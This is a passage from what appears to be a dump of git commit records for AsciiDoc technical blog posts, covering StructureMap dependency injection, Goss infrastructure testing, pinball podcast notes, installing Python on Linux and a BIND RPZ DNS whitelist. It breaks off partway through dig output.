Personally I use property injection a lot, because it keeps the code very compact and avoids wiring the references by hand (I find it cleaner on that point). However, when I do, I am much stricter about the rules for manipulating those instances. The responsibility for handling them must clearly belong to the dependent alone, otherwise it opens the door to many problems.\n\n\n== Lifecycle\n\nSince the beginning of this article, creating the instances of the dependencies has been fully delegated to the Container class. The big question now is: how do I manage the lifecycle of the instances within my container?\n\nStructureMap, like every IoC container, provides a set of methods and classes to manage this. By default, when a binding between a contract and an implementation is added, the container sets its lifecycle to Transient. This means that every time it resolves the dependency it creates a new instance. It is in any case possible to put the dependency in Transient mode explicitly:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Transient();\n----\n\nLogically, if the dependency is requested twice, the references are different:\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print False\n----\n\nA frequent case in object lifecycles is the unique instance. It is obtained with the Singleton method:\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use<ConsoleLogger>().Singleton();\n----\n\nAs a result, the reference test made earlier now returns True:\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\nvar logger2 = container.GetInstance<ILogger>();\nConsole.WriteLine(logger == logger2);\/\/print True\n----\n\nThese two cases are among the main ones found in development, but there are others that manage the life of the instance on a thread, or inside a container wrapped in a temporary scope (ContainerScoped, used notably to handle the DNX case).\n\nThere is one more way to declare a lifecycle with StructureMap. The library has an ILifecycle interface that makes it easy to implement your own lifecycle. It can then be used in the configuration with the LifecycleIs<T> method (where T implements ILifecycle).\n
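\nAs a purely illustrative sketch of that last point (MyCustomLifecycle is a hypothetical class, assumed to implement ILifecycle; only LifecycleIs<T> itself comes from StructureMap), the registration would look like this:\n\n[source,csharp]\n----\n\/\/MyCustomLifecycle : ILifecycle decides how instances are cached and reused\nconfiguration.For<ILogger>().Use<ConsoleLogger>().LifecycleIs<MyCustomLifecycle>();\n----\n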
\nWARNING: Custom lifecycles can be useful in many cases. Some libraries provide specialized lifecycles, for the web for example. With version 4 of StructureMap, the development team strongly encourages no longer using this mode of operation, and preferring the NestedContainer instead. It answers 95% of the use cases without needing any extra library or additional code.\n\nAs stated in the warning above, NestedContainers also manage the lifecycle of instances. Using them clearly simplifies life, because from the moment the NestedContainer is obtained, every instance retrieved from it belongs to it. It then suffices to call the Dispose method to release it. It is a very flexible approach, since establishing a scope is all it takes for it to work. On top of that, in this mode every dependency implementing IDisposable is disposed when the method is called on the NestedContainer. As a result, the three StructureMap states are enough to handle all the cases, including those tied to a web context. To illustrate this, a simple scope can be imagined: the execution of a few lines of code. In that case, here are the steps to put it in place:\n\n* The NestedContainer is created and starts the scope\n* The desired code is executed\n* The NestedContainer releases the dependencies.\n\nThese three steps can of course be replayed indefinitely. To show that Dispose behaves correctly, a disposable implementation of ILogger will be used:\n\n[source,csharp]\n----\npublic class DisposableConsoleLogger : ConsoleLogger, IDisposable\n{\n\tpublic void Dispose()\n\t{\n\t\tConsole.WriteLine(\"Hello from Dispose !\");\n\t}\n}\n----\n\nNothing changes in the configuration, apart from Use<T> now using DisposableConsoleLogger:\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<DisposableConsoleLogger>();\n});\n----\n\nThe code for the three steps is the following:\n\n[source,csharp]\n----\nvar nested = container.GetNestedContainer();\nvar logger = nested.GetInstance<ILogger>();\nnested.Dispose();\/\/print Hello from Dispose !\n----\n\nTo illustrate the clean isolation of this scope, just wrap it in a for loop and test whether the last retrieved instance is the same as the current one:\n\n[source,csharp]\n----\nILogger last = null;\nfor(var i = 0; i < 10; i++)\n{\n\tvar nested = container.GetNestedContainer();\n\tvar logger = nested.GetInstance<ILogger>();\n\tif (last != null)\n\t\tConsole.WriteLine(last == logger);\/\/print False\n\tlast = logger;\n\tnested.Dispose();\/\/print Hello from Dispose !\n}\n----\n\nIn the end, really nothing complicated about the NestedContainer. It is a powerful and very elegant technique; you just have to clearly define the scoping in your application!\n\nAt this stage, the tour of StructureMap is complete. You now have the keys to put it in place in your projects. The example I used to write this article is available as a GitHub Gist: https:\/\/gist.github.com\/Vtek\/7e5064a188417713a2d8[here].\n\nTo finish, here is one last small section about...\n\n\n== Best practices\n\nHere is a set of rules worth following:\n\n* Hide access to the Container: inversion of control is there to break coupling. If you specifically use a Container to resolve dependencies, the opposite happens.
It is therefore better to go through an intermediate layer that lets you swap the Container easily if needed.\n\n* Prefer constructor injection: it requires no injection logic and is therefore the simplest way to put injection in place!\n\n* Do not forget property injection: some cases cannot be handled with constructor injection; do not hesitate to use property injection, that is what it is for!\n\n* Do not mix lifecycles: many have tried and broken their teeth on it. Apart from Singleton, which is simple to understand and to mix, abstain for the rest. The risk of mixing is that as the project grows, the retention graph between instances becomes more and more complex. Situations can quickly get out of control.\n\n* Do not inject primitive types: technically it is feasible, but it is a mistake. Dependents expect dependencies defined by contracts; primitive types do not answer that need.\n\n* Do not resolve dependencies based on strings (name, type, namespace): here again it is technically possible, but it complicates maintenance and forces you to revalidate the Container configuration every time a dependency, property or namespace is renamed. You will end up losing time, and there are far more effective ways to do it.\n\n* There is no need to define custom lifecycles, prefer scoping: the NestedContainer example speaks for itself :)\n\n* Do not mix IoC and reflection: it is a false good idea. They are two quite different aspects that can sometimes reach the same result but do not have the same purpose at all. If you end up doing reflection to activate dependencies, use https:\/\/msdn.microsoft.com\/fr-fr\/library\/dd460648(v=vs.110).aspx[MEF] instead. If that is not the case, then you are most likely doing something an IoC Container already does :)\n\n* Your container should never be used in unit tests.\n\n* Dependencies can quickly grow in number. To keep their configuration organized, StructureMap provides a class called Registry, which groups the configuration by dependency domain (a sketch follows this list).\n\n* With inversion of control, dependency resolution happens at runtime. It is therefore the application that must hold the references. There is no point trying to hide them; you will gain neither time nor development comfort!\n
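\nTo illustrate the Registry class mentioned in the list above, here is a minimal sketch; the LoggingRegistry name is made up for the example, only the Registry base class and AddRegistry<T> come from StructureMap:\n\n[source,csharp]\n----\npublic class LoggingRegistry : Registry\n{\n\tpublic LoggingRegistry()\n\t{\n\t\t\/\/All logging-related bindings are grouped in one place\n\t\tFor<ILogger>().Use<ConsoleLogger>();\n\t}\n}\n\n\/\/The registry is then handed to the container\nvar container = new Container(configuration =>\n{\n\tconfiguration.AddRegistry<LoggingRegistry>();\n});\n----\n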
\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"39fb3d4a1082cf243a8b50b244d9b08561f214e6","subject":"Update 2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","message":"Update 2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","new_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-Goss.adoc","new_contents":"= Easy Infrastructure Testing with Goss\n:hp-tags: Configuration Management, Testing, Security, Monitoring, goss\n:hp-image: \/images\/covers\/cover-01.jpg\n\n\nIn the world of infrastructure, new servers, VMs, containers or applications are often manually validated by a human, and some form of build document or checkbox exercise takes place. Even with configuration management, mistakes happen and humans miss things.\n\nWouldn't it be great if there were an easy way to automatically validate new servers before they go live, rather than finding the problems in production? Well, there is!\n\n== What is Goss?\nhttps:\/\/github.com\/aelsabbahy\/goss[Goss] is a tool that lets you easily test and validate infrastructure. Like http:\/\/serverspec.org\/[Serverspec], but without all the code. Goss allows you to define what a piece of infrastructure should look like with YAML or JSON. This is made even easier for us with the ability to auto add resources to the Goss configuration.\n\nGoss allows you to validate many different resource types such as files, users, groups, packages, services and http connectivity. You can read the full https:\/\/github.com\/aelsabbahy\/goss\/blob\/master\/docs\/manual.md#available-tests[Goss documentation].\n\n== Why Goss? \nWell, a few things make goss awesome: \n\n* Written in Go - it's a self-contained binary with no dependencies on other libraries or Ruby. \n* It's super fast - taking advantage of Go's concurrency model, tests are executed and returned almost instantly.\n* It's easy to get started with - defining resources in YAML or JSON makes it easy for infrastructure teams who may have limited development experience to get to grips with.\n\n=== An Example\nWe build a web server running Apache. Someone then checks that the Apache `httpd` package is the correct version `2.4.25`, the `deployment` user is in the `www-data` group, there is an application directory at `\/srv\/www\/app`, the `httpd` service is running, we can connect to the application at `http:\/\/localhost\/app`, and going to `http:\/\/localhost\/` gives a `404` error within 1 second.\n\nWith Goss, the YAML configuration would look like this:\n\n```yaml\n---\npackage:\n  httpd:\n    installed: true\n    versions:\n    - 2.4.25\nuser:\n  deployment:\n    exists: true\n    groups:\n    - deployment\n    - www-data\nfile:\n  \/srv\/www\/app:\n    exists: true\n    filetype: directory\nservice:\n  httpd:\n    enabled: true\n    running: true\nhttp:\n  http:\/\/localhost\/app:\n    status: 200\n    timeout: 1000\n  http:\/\/localhost:\n    status: 404\n    timeout: 1000\n```\n\nThat's quite simple, easy to understand what is being validated, and can be used to consistently validate all servers of that configuration.\n
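\nAssuming the YAML above is saved as goss.yaml in the current directory, running the tests is a single command; the -g flag and the nagios_verbose format shown here reflect my understanding of the tool's CLI, so double-check against the docs:\n\n```\n# Run all tests in .\/goss.yaml\ngoss validate\n\n# Or point at a specific file and pick an output format\ngoss -g \/etc\/goss\/goss.yaml validate --format nagios_verbose\n```\n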
\n== Server Validation and Monitoring\nAll this validation of files, processes, services, ports etc... sounds familiar. It's something that we quite often try to achieve with our monitoring tools like Nagios, Zabbix or Sensu.\n\nWith Goss we can create a single monitoring check for the validation of a piece of infrastructure that may test many resources. Goss has outputs to make this really easy. The nagios_verbose output gives feedback on what is wrong:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/1253072\/18037748\/76f65a32-6d83-11e6-9aba-bceabb8430a3.png[Goss - nagios_verbose output]\n\nServer validation can now become part of your monitoring pipeline, ensuring that any problems are identified quickly with a single monitoring check.\n\nWARNING: Goss won't replace all of your checks; it doesn't check things like HDD space, RAM usage or errors in log files. But it makes a sweet addition to server \/ service monitoring.\n\n== HTTP Health Endpoint\nIt's becoming increasingly common to expose health endpoints for applications and services. Google did this with their Borgmon monitoring system, https:\/\/prometheus.io\/[Prometheus] also uses this scrape model, and there are several libraries out there such as http:\/\/metrics.dropwizard.io\/3.1.0\/[Dropwizard Metrics] or http:\/\/blog.kristian.io\/django-health-check\/[Django Health Check] to name a few. \n\nGoss has a `serve` command that exposes an http endpoint with configurable output such as json. This makes it easy to create a simple UI, or to utilise something like https:\/\/www.phpservermonitor.org\/[PHP Server Monitor] to show the validation status of each piece of infrastructure.\n
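\nA minimal sketch of how that can be wired up; the listen port and \/healthz path below are goss defaults as far as I recall, so treat them as assumptions:\n\n```\n# Expose the validation results over HTTP as JSON\ngoss serve --format json\n\n# From the monitoring side, scrape the health endpoint\ncurl http:\/\/localhost:8080\/healthz\n```\n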
\n== Final Thoughts\n\nI hope that with some learning and experimentation you can see the value of validation testing your infrastructure and of building validation into your monitoring systems. Goss is a young project and currently only supports Linux, although it is active and open to contributions. You can help out by opening issues and pull requests.\n\nI'll follow up with more in-depth Goss-related posts in the future. Thanks for reading!\n","old_contents":"= Easy Infrastructure Testing with Goss\n:hp-tags: Configuration Management, Testing, Security, Monitoring, goss\n:hp-image: covers\/cover-01.jpg\n\n\nIn the world of infrastructure, new servers, VMs, containers or applications are often manually validated by a human, and some form of build document or checkbox exercise takes place. Even with configuration management, mistakes happen and humans miss things.\n\nWouldn't it be great if there were an easy way to automatically validate new servers before they go live, rather than finding the problems in production? Well, there is!\n\n== What is Goss?\nhttps:\/\/github.com\/aelsabbahy\/goss[Goss] is a tool that lets you easily test and validate infrastructure. Like http:\/\/serverspec.org\/[Serverspec], but without all the code. Goss allows you to define what a piece of infrastructure should look like with YAML or JSON. This is made even easier for us with the ability to auto add resources to the Goss configuration.\n\nGoss allows you to validate many different resource types such as files, users, groups, packages, services and http connectivity. You can read the full https:\/\/github.com\/aelsabbahy\/goss\/blob\/master\/docs\/manual.md#available-tests[Goss documentation].\n\n== Why Goss? \nWell, a few things make goss awesome: \n\n* Written in Go - it's a self-contained binary with no dependencies on other libraries or Ruby. \n* It's super fast - taking advantage of Go's concurrency model, tests are executed and returned almost instantly.\n* It's easy to get started with - defining resources in YAML or JSON makes it easy for infrastructure teams who may have limited development experience to get to grips with.\n\n=== An Example\nWe build a web server running Apache. Someone then checks that the Apache `httpd` package is the correct version `2.4.25`, the `deployment` user is in the `www-data` group, there is an application directory at `\/srv\/www\/app`, the `httpd` service is running, we can connect to the application at `http:\/\/localhost\/app`, and going to `http:\/\/localhost\/` gives a `404` error within 1 second.\n\nWith Goss, the YAML configuration would look like this:\n\n```yaml\n---\npackage:\n  httpd:\n    installed: true\n    versions:\n    - 2.4.25\nuser:\n  deployment:\n    exists: true\n    groups:\n    - deployment\n    - www-data\nfile:\n  \/srv\/www\/app:\n    exists: true\n    filetype: directory\nservice:\n  httpd:\n    enabled: true\n    running: true\nhttp:\n  http:\/\/localhost\/app:\n    status: 200\n    timeout: 1000\n  http:\/\/localhost:\n    status: 404\n    timeout: 1000\n```\n\nThat's quite simple, easy to understand what is being validated, and can be used to consistently validate all servers of that configuration.\n
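\nAssuming the YAML above is saved as goss.yaml in the current directory, running the tests is a single command; the -g flag and the nagios_verbose format shown here reflect my understanding of the tool's CLI, so double-check against the docs:\n\n```\n# Run all tests in .\/goss.yaml\ngoss validate\n\n# Or point at a specific file and pick an output format\ngoss -g \/etc\/goss\/goss.yaml validate --format nagios_verbose\n```\n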
\n== Server Validation and Monitoring\nAll this validation of files, processes, services, ports etc... sounds familiar. It's something that we quite often try to achieve with our monitoring tools like Nagios, Zabbix or Sensu.\n\nWith Goss we can create a single monitoring check for the validation of a piece of infrastructure that may test many resources. Goss has outputs to make this really easy. The nagios_verbose output gives feedback on what is wrong:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/1253072\/18037748\/76f65a32-6d83-11e6-9aba-bceabb8430a3.png[Goss - nagios_verbose output]\n\nServer validation can now become part of your monitoring pipeline, ensuring that any problems are identified quickly with a single monitoring check.\n\nWARNING: Goss won't replace all of your checks; it doesn't check things like HDD space, RAM usage or errors in log files. But it makes a sweet addition to server \/ service monitoring.\n\n== HTTP Health Endpoint\nIt's becoming increasingly common to expose health endpoints for applications and services. Google did this with their Borgmon monitoring system, https:\/\/prometheus.io\/[Prometheus] also uses this scrape model, and there are several libraries out there such as http:\/\/metrics.dropwizard.io\/3.1.0\/[Dropwizard Metrics] or http:\/\/blog.kristian.io\/django-health-check\/[Django Health Check] to name a few. \n\nGoss has a `serve` command that exposes an http endpoint with configurable output such as json. This makes it easy to create a simple UI, or to utilise something like https:\/\/www.phpservermonitor.org\/[PHP Server Monitor] to show the validation status of each piece of infrastructure.\n\n== Final Thoughts\n\nI hope that with some learning and experimentation you can see the value of validation testing your infrastructure and of building validation into your monitoring systems. Goss is a young project and currently only supports Linux, although it is active and open to contributions. You can help out by opening issues and pull requests.\n\nI'll follow up with more in-depth Goss-related posts in the future. Thanks for reading!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"77492d34e93d5bdb7d69c65dd9e7a5bb63ea2b6e","subject":"Update 2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","message":"Update 2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","new_file":"_posts\/2016-06-29-Episode-62-Console-Yourself-With-Cheap-Steam.adoc","new_contents":"= Episode 62: Console Yourself With Cheap Steam\n:hp-tags: steam, console, UI, BackRoom\n:hp-image: logo.png\n\nIt's a bit light on pinball news this week.\n\nIn light of this, we look into how folks on other platforms could capitalise on Steam sales for PC.\nYou might be surprised at how easy it is for a TPA console player (PS3\/PS4 or Xbox) to get cheap tables and frequent updates.\n\nIn the aftermath of the New UI's premature birth on Android, we also give a PSA about how to talk to engineers about fixes or observations you have with an application.\n\nThere's a BlahCade BackRoom longer than the main show, with one of the most obnoxious wedding announcements you will ever have heard.\nIf you don't fancy hearing us talk about it, just take a look at the link and prepare to groan.\n\nNOTE: There is a bit of an audio race condition at about 17 minutes in.\nIt sounds like Jared is talking right over Chris.\nHe wasn't.\nIt's a Blab thing...\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/#[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/twitter.com\/blahcade[@BlahCade on Twitter]\n\nhttps:\/\/blab.im\/BlahCade[BlahCade on Blab.im (Live Session Recordings)]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Introduction - 0:30\n* Beta for Indy 500 on PC - 1:10\n* Pinball Arcade Tables Deeply Discounted - 3:20\n* Zen Tables Deeply Discounted - 6:05\n* Should Console Owners Switch to Steam? - 6:35\n** What is the minimum recommended GPU spec? - 7:20\n** Can a GTX-670 cope with TPA? - 9:15\n** Chris, reporting from Blackwater 300 - 10:45\n** How could I test it out on my PC? - 11:40\n* http:\/\/www.samvandoorn.net\/?\/web\/project-1\/[_STYN The Machine_ by Sam Van Doorn] - 12:45\n* New UI on Android Progress Report - 15:20\n** _Constructive_ criticism sought - 17:50\n** How to be constructive when providing feedback - 19:40\n* TPA Android Users Guide 2.0 - 22:08\n* Outtro (before BackRoom) - 24:14\n* http:\/\/postgradproblems.com\/this-hipster-marriage-announcement-from-the-new-york-times-is-the-most-insufferable-yet\/[BackRoom: Hipster Wedding Announcement] - 25:55\n* Hard Outtro - 43:25\n
","old_contents":"= Episode 62: Console Yourself With Cheap Steam\n:hp-tags: steam, console, New_UI, BackRoom\n:hp-image: logo.png\n\nIt's a bit light on pinball news this week.\n\nIn light of this, we look into how folks on other platforms could capitalise on Steam sales for PC.\nYou might be surprised at how easy it is for a TPA console player (PS3\/PS4 or Xbox) to get cheap tables and frequent updates.\n\nIn the aftermath of the New UI's premature birth on Android, we also give a PSA about how to talk to engineers about fixes or observations you have with an application.\n\nThere's a BlahCade BackRoom longer than the main show, with one of the most obnoxious wedding announcements you will ever have heard.\nIf you don't fancy hearing us talk about it, just take a look at the link and prepare to groan.\n\nNOTE: There is a bit of an audio race condition at about 17 minutes in.\nIt sounds like Jared is talking right over Chris.\nHe wasn't.\nIt's a Blab thing...\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/#[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/twitter.com\/blahcade[@BlahCade on Twitter]\n\nhttps:\/\/blab.im\/BlahCade[BlahCade on Blab.im (Live Session Recordings)]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Introduction - 0:30\n* Beta for Indy 500 on PC - 1:10\n* Pinball Arcade Tables Deeply Discounted - 3:20\n* Zen Tables Deeply Discounted - 6:05\n* Should Console Owners Switch to Steam? - 6:35\n** What is the minimum recommended GPU spec? - 7:20\n** Can a GTX-670 cope with TPA? - 9:15\n** Chris, reporting from Blackwater 300 - 10:45\n** How could I test it out on my PC? - 11:40\n* http:\/\/www.samvandoorn.net\/?\/web\/project-1\/[_STYN The Machine_ by Sam Van Doorn] - 12:45\n* New UI on Android Progress Report - 15:20\n** _Constructive_ criticism sought - 17:50\n** How to be constructive when providing feedback - 19:40\n* TPA Android Users Guide 2.0 - 22:08\n* Outtro (before BackRoom) - 24:14\n* http:\/\/postgradproblems.com\/this-hipster-marriage-announcement-from-the-new-york-times-is-the-most-insufferable-yet\/[BackRoom: Hipster Wedding Announcement] - 25:55\n* Hard Outtro - 43:25\n
","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0971cd6ab7129aef283617e9ab9a1fb4c49e795e","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"= How to install Python on Linux\n:hp-alt-title: how to install python on linux\n:hp-image: https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/python-pip.png\n\nPython can be installed on any operating system, for example Windows, Unix and Linux.\nThe easiest way to install Python is to use a package manager, e.g. apt-get, yum, pacman, etc.\n\nOn debian\/ubuntu distributions we can run the following commands.\nFor example, to install a 2.x version:\n\n * sudo apt-get install python2.7\n\nTo install a 3.x version:\n\n * sudo apt-get install python3.3\n \n\nWe can also install the latest version from the source code (i.e. from Source). The source code can be downloaded from Python's official page or over FTP - https:\/\/www.python.org\/ftp\/python\/[Python Source Code]. We pick the latest version, 3.5.1, take the *.tgz file Python-3.5.1.tgz, then open a terminal and run the commands below:\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n 
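\nBecause make altinstall deliberately avoids overwriting the system python binary, the freshly built interpreter is invoked by its versioned name; assuming the commands above succeeded, a quick check is:\n\n * python3.5 -V\n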
\nThe Python installation process completed successfully.\n\nSee the screenshot below\nimage:https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/pythonge.png []\n\n:hp-tags: title[python],title[linux]","old_contents":"= How to install Python on Linux\n:hp-alt-title: how to install python on linux\n:hp-image: https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/python-pip.png\n\nPython can be installed on any operating system, such as Windows, Unix and Linux.\nThe easiest way to install Python is to use a package manager, e.g. apt-get, yum, pacman, etc.\n\nOn debian\/ubuntu distributions we can run the following commands.\nFor example, to install a 2.x version:\n\n * sudo apt-get install python2.7\n\nTo install a 3.x version:\n\n * sudo apt-get install python3.3\n \n\nWe can also install the latest version from source. The source can be downloaded from Python's official page or over FTP - https:\/\/www.python.org\/ftp\/python\/[Python Source Code]. We pick the latest version, 3.5.1, take the *.tgz file Python-3.5.1.tgz, then open a terminal and run the commands below:\n\n * wget http:\/\/python.org\/ftp\/python\/3.5.1\/Python-3.5.1.tgz\n * tar -xvf Python-3.5.1.tgz\n * cd Python-3.5.1\n * .\/configure\n * make\n * make altinstall\n 
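\nBecause make altinstall deliberately avoids overwriting the system python binary, the freshly built interpreter is invoked by its versioned name; assuming the commands above succeeded, a quick check is:\n\n * python3.5 -V\n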
\nThe Python installation process completed successfully.\n\nSee the screenshot below\nimage:https:\/\/raw.githubusercontent.com\/Lh4cKg\/Lh4cKg.github.io\/master\/images\/pythonge.png []\n\n:hp-tags: title[python],title[linux]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"abe2c9ee6c5015bdce518cb0708264bfbdf9ecd3","subject":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","message":"Update 
2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_contents":"= DNS Whitelist in BIND with RPZ\n :hp-image: \/covers\/cover.png\n :hp-tags: DNS, Filtering, Firewall, Security\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous privacy issues with smart TVs of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So to be safe I initially decided to block the TV completely from connecting to the internet, by blocking it at my router.\n\nAs it turns out, however, the built-in Netflix app on the TV is the only way I can watch true UHD (10bit colour) 4k content on the TV (don't get me started!)\n\nSo I found myself in a situation where I needed to allow the TV to connect out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit its access to just Netflix? I modified the router ACL to allow it to talk to all the IPv4 prefixes announced by AS2906 [Netflix Streaming Services Inc.] This unfortunately didn't work; without looking too deeply, it seemed Akamai was involved in at least some of the traffic. Either way the app didn't work. I could have continued to investigate and added more IP ranges to the ACL to make it work, but it seemed like a lot of trouble.\n\nRuling out cumbersome IP-based blocking, I began to wonder: could I perhaps limit its access by restricting the domain names it could resolve?\n\n== Enter DNS RPZ\n\nI am relatively familiar with Bind, having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up; however, I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then defined two RPZ 'zones' in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authoritative master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n };\n\nAs can be seen, the zone definitions reference the location of the zone file for each. The files are created as follows, using the RPZ syntax.
 The first zone, rpz.whitelist, lists the domains I had worked out Netflix used:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterisk on its own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n IN NS localhost.\n\n* CNAME .\n....\n
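\nBefore reloading, the configuration and the two new zone files can be sanity-checked with Bind's own tools (using the zone names and file paths defined above):\n\n....\nnamed-checkconf\nnamed-checkzone rpz.whitelist \/etc\/bind\/db.rpz.whitelist\nnamed-checkzone rpz \/etc\/bind\/db.rpz\n....\n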
\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n== Results\n\nSo does it work? If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nAnd if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 